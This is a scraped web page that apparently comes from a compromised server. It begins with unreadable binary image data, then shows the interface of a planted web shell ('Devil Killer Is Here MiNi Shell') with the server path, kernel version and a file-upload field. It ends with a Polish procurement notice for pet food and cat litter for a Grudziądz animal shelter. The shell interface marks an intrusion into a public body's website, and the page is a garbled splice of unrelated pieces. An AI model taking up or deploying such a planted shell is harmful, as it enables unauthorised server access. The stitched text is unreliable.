JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231130/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231130/0052318601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wraz z rozładunkiem karmy dla psów i kotów przebywających w COZ w Grudziądzu, ul. Przytulna 1 oraz kotów wolno bytujących na terenie Grudziądza, a także żwirku dla kotów przebywających w COZ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZAKŁAD KOMUNIKACJI SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871528212</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(0-56) 45-04-210</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzk.grudziadz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzk.grudziadz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wraz z rozładunkiem karmy dla psów i kotów przebywających w COZ w Grudziądzu, ul. Przytulna 1 oraz kotów wolno bytujących na terenie Grudziądza, a także żwirku dla kotów przebywających w COZ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-062b1c46-8f53-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00523186</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gpp_grudziadz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja w postępowaniu<br/>odbywa się przy użyciu środków komunikacji elektronicznej, za pomocą platformy zakupowej<br/>https://platformazakupowa.pl/pn/gpp_grudziadz<br/>2) W korespondencji kierowanej do Zamawiającego, jak i przy składaniu oferty, Wykonawca winien posługiwać się nazwą i numerem<br/>sprawy.<br/>3) Zamawiający informuje, iż w zakresie pytań dotyczących funkcjonowania platformy zakupowej należy kontaktować się z Centrum<br/>Wsparcia Klienta platformazakupowa.pl pod numerem 22 10 10 202, lub cwk@platformazakupowa.pl<br/>4) Zamawiający informuje, że instrukcje korzystania z platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na<br/>stronie internetowej pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>5) Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w<br/>regulaminie platformazakupowa.pl https://platformazakupowa.pl/strona/1-regulamin<br/>6) Zamawiający określa minimalne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformie zakupowej:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar,<br/>h) maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>7) Wykonawca, przystępując do niniejszego postępowania:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin” oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do instrukcji składania ofert/wniosków dostępne pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>8) Ofertę, oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej.<br/>9) Szczegółowe wytyczne zostały określone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje podstawowe dotyczące przetwarzania danych osobowych<br/>1) Administratorem danych osobowych przetwarzanych w związku z prowadzonym postępowaniem o udzielenie zamówienia<br/>publicznego jest Miejski Zakład Komunikacji Spółka z ograniczoną odpowiedzialnością z siedzibą w Grudziądzu. Można się z nami<br/>skontaktować w następujący sposób: − listownie na adres: ul. Dworcowa 47, 86-300 Grudziądz; − przez e-mail:<br/>sekretariat@mzk.grudziadz.pl − telefonicznie: 56 45 10 210.<br/>2) Inspektor Ochrony Danych, z którym można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych<br/>osobowych oraz korzystania z przysługujących praw związanych z przetwarzaniem danych. Można się z nim kontaktować w<br/>następujący sposób: − listownie na adres: ul. Dworcowa 47, 86-300 Grudziądz − przez e-mail: marekrolewicz@ochrona-informacji.pl<br/>− telefonicznie: 514-821-093.<br/>3) Dane będą przetwarzane w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego oraz w celu<br/>wypełnienia obowiązków wynikających z ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej. Obowiązek podania<br/>danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>4) Szczegółowe wytyczne przetwarzania danych osobowych zostały określone w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-MZK-2023-24-2</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Karma sucha dla kotów – (opakowanie karma dla kotów 10 kg - 15 kg) o składzie analitycznym:<br/>• mięso nie mniej niż 20%,<br/>• produkty pochodzenia zwierzęcego nie mniej niż 20%<br/>• białko surowe nie mniej niż 10,2%,<br/>• włókno surowe nie mniej niż 0,4%,<br/>• oleje i tłuszcze surowe nie mniej niż 5,8%,<br/>• popiół nie więcej niż 2,5%,<br/>• wilgotność nie mniej niż 80%,<br/>• CA 1,3-1,4%,<br/>• P 1,0-1,1%,<br/>• Na 0,25%-0,30%,<br/>• tauryna nie mniej niż 1500 mg,<br/>• witamina A nie mniej niż 1000 m.j/kg,<br/>• witamina E nie mniej niż 80 mg/kg,<br/>• zawiera mikroelementy w postaci helatów;<br/>Karma sucha dla kotów wolno bytujących – (opakowanie karma kotów<br/>15 kg - 20 kg) o składzie analitycznym:<br/>• białko surowe nie mniej niż 10%,<br/>• włókno surowe 2-2,6%,<br/>• oleje i tłuszcze surowe nie mniej niż 11%,<br/>• popiół nie więcej niż 8,7%,<br/>• CA 1,3-1,4%,<br/>• P 1,0-1,1%,<br/>• Na 0,25%-0,30%,<br/>• tauryna nie mniej niż 750 mg,<br/>• witamina A nie mniej niż 1000 m.j/kg,<br/>• witamina E nie mniej niż 80 mg/kg<br/>• zawiera mikroelementy w postaci helatów;<br/>Karma mokra dla kotów (opakowanie puszka 400 gr - 800 gr) o składzie analitycznym:<br/>• mięso nie mniej niż 20%,<br/>• Białko surowe nie mniej niż 10,2%,<br/>• Włókno surowe nie mniej niż 0,4 %,<br/>• Tłuszcz surowy nie mniej niż 4,5 %,<br/>• Popiół surowy nie więcej niż 2,5 %,<br/>• Wilgotność nie mniej niż 80 % </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15713000-9 - Karma dla zwierząt domowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie będzie realizowane z zastosowaniem prawa opcji:<br/>a) karma suchej dla kotów:<br/>• Ilość dostawy gwarantowanej przez Zamawiającego - 1200 kg;<br/>• Ilość dostawy na prawach opcji - 1200 kg;<br/>b) karma sucha dla kotów wolno bytujących:<br/>• Ilość dostawy gwarantowanej przez Zamawiającego - 3000 kg;<br/>• Ilość dostawy na prawach opcji - 3000 kg.<br/>c) karma mokra dla kotów:<br/>• Ilość dostawy gwarantowanej przez Zamawiającego – 552 kg;<br/>• Ilość dostawy na prawach opcji – 552 kg.<br/>Zamawiający zastrzega sobie prawo do zmniejszenia ilości poszczególnych dostaw, przy czym zamawiający gwarantuje<br/>zakup produktów w podanych wyżej ilościach. Wykonawcy nie przysługują jakiekolwiek roszczenia względem<br/>zamawiającego, a przede wszystkim roszczenia o zapłatę za ilości produktów niedostarczonych, przewyższającą minimalną, gwarantowaną wielkość zamówienia. Ilość dostaw uzależniony jest od ilości zwierząt. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów określonych w pkt 20.2. SWZ, przyjmując zasadę, że 1% = 1 pkt.<br/>Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu na podstawie kryteriów oceny<br/>ofert:<br/>Nazwa kryterium: C (KC) – Cena oferty, Punkty: max. 100, Waga: 100%<br/>Łączna ocena punktowa obliczona zostanie wg wzoru:<br/>KC= (Cena brutto najniższa spośród ofert nieodrzuconych)/(Cena brutto badanej oferty spośród ofert nieodrzuconych) × 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Żwirek kukurydziany dla kotów (opakowanie 15 kg - 23 kg):<br/>• w 100% naturalny i biodegradowalny<br/>• zbrylający żwirek kukurydziany o właściwościach maskujących zapach kociego moczu, co zwiększa higienę w kuwecie<br/>oraz gwarantuje dłuższą świeżość żwirku.<br/>• Zbrylone grudki muszą być mocno związane, dzięki czemu nie rozpadają się przy wyciąganiu łopatką z kuwety. Żwirek<br/>przez to jest znacznie bardziej wydajny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14210000-6 - Żwir, piasek, kamień kruszony i kruszywa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie będzie realizowane z zastosowaniem prawa opcji:<br/>żwirek kukurydziany dla kotów:<br/>• Ilość dostawy gwarantowanej przez Zamawiającego – 1200 kg;<br/>• Ilość dostawy na prawach opcji – 1200 kg.<br/>Zamawiający zastrzega sobie prawo do zmniejszenia ilości poszczególnych dostaw, przy czym zamawiający gwarantuje<br/>zakup produktów w podanych wyżej ilościach. Wykonawcy nie przysługują jakiekolwiek roszczenia względem<br/>zamawiającego, a przede wszystkim roszczenia o zapłatę za ilości produktów niedostarczonych, przewyższającą minimalną,<br/>gwarantowaną wielkość zamówienia. Ilość dostaw uzależniony jest od ilości zwierząt. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów określonych w pkt 20.2. SWZ, przyjmując zasadę, że 1% = 1 pkt.<br/>Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu na podstawie kryteriów oceny<br/>ofert:<br/>Nazwa kryterium: C (KC) – Cena oferty, Punkty: max. 100, Waga: 100%<br/>Łączna ocena punktowa obliczona zostanie wg wzoru:<br/>KC= (Cena brutto najniższa spośród ofert nieodrzuconych)/(Cena brutto badanej oferty spośród ofert nieodrzuconych) × 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się: Wykonawcy wobec których nie zachodzą podstawy do<br/>wykluczenia z postępowania, o których mowa w pkt. 12.1. SWZ oraz spełniają warunki udziału w postępowaniu określone w<br/>art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>a) Zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia szczególnych wymagań w zakresie<br/>spełnienia tego warunku.<br/>b) Uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie<br/>stawia szczególnych wymagań w zakresie spełnienia tego warunku.<br/>c) Sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego<br/>warunku.<br/>d) Zdolności technicznej lub zawodowej – Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego<br/>warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) informacji z Krajowego<br/>Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1 i 2, oraz art. 108 ust. 1 pkt 4 ustawy Pzp, sporządzonej nie wcześniej<br/>niż 6 miesięcy przed jej złożeniem,<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>c) oświadczenia wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – (wzór<br/>stanowi Załącznik nr 6 do SWZ).<br/>d) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>− art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>− art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>− art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>− art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>(wzór stanowi Załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia publicznego (np. konsorcjum, spółka cywilna)<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku do oferty należy 